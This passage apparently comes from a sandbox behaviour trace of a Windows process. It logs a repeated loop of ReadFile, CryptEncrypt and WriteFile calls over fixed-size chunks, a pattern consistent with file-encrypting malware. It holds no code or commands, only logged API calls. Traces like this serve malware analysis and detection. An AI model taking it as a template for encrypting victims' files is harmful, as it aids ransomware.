pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.933] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.933] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.933] CryptEncrypt (in: hKey=0x2fb2c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.933] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.933] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.933] CryptEncrypt (in: hKey=0x2fb2c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.933] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.933] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.933] CryptEncrypt (in: hKey=0x2fb2c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.934] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.934] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.934] CryptEncrypt (in: hKey=0x2fb2c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.934] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.934] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.934] CryptEncrypt (in: hKey=0x2fb2c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.934] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.934] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.934] CryptEncrypt (in: hKey=0x2fb2c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.934] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.934] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.934] CryptEncrypt (in: hKey=0x2fb2c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.934] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.934] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.935] CryptEncrypt (in: hKey=0x2fb2c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.935] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.935] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.935] CryptEncrypt (in: hKey=0x2fb2c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.935] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.935] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.935] CryptEncrypt (in: hKey=0x2fb2c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.935] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.935] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.935] CryptEncrypt (in: hKey=0x2fb2c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.935] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.935] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.935] CryptEncrypt (in: hKey=0x2fb2c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.935] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.936] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.936] CryptEncrypt (in: hKey=0x2fb2c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.936] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.936] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.936] CryptEncrypt (in: hKey=0x2fb2c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.936] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.936] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.936] CryptEncrypt (in: hKey=0x2fb2c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.936] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.936] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.936] CryptEncrypt (in: hKey=0x2fb2c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.936] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.937] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.937] CryptEncrypt (in: hKey=0x2fb2c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.937] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.937] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.937] CryptEncrypt (in: hKey=0x2fb2c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.937] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.937] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.937] CryptEncrypt (in: hKey=0x2fb2c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.937] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.937] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.937] CryptEncrypt (in: hKey=0x2fb2c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.937] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.937] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.937] CryptEncrypt (in: hKey=0x2fb2c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.938] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.938] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.938] CryptEncrypt (in: hKey=0x2fb2c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.938] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.938] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.938] CryptEncrypt (in: hKey=0x2fb2c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.938] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.938] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.938] CryptEncrypt (in: hKey=0x2fb2c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.938] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.938] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.938] CryptEncrypt (in: hKey=0x2fb2c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.938] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.938] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.939] CryptEncrypt (in: hKey=0x2fb2c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.939] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.939] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.939] CryptEncrypt (in: hKey=0x2fb2c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.939] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.939] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.939] CryptEncrypt (in: hKey=0x2fb2c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.939] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.939] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.939] CryptEncrypt (in: hKey=0x2fb2c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.939] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.939] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.939] CryptEncrypt (in: hKey=0x2fb2c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.939] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.940] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.940] CryptEncrypt (in: hKey=0x2fb2c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.940] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.940] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.940] CryptEncrypt (in: hKey=0x2fb2c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.940] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.940] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.940] CryptEncrypt (in: hKey=0x2fb2c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.940] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.940] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.940] CryptEncrypt (in: hKey=0x2fb2c8, hHash=0x0, Final=0, dwFlags=0x0, 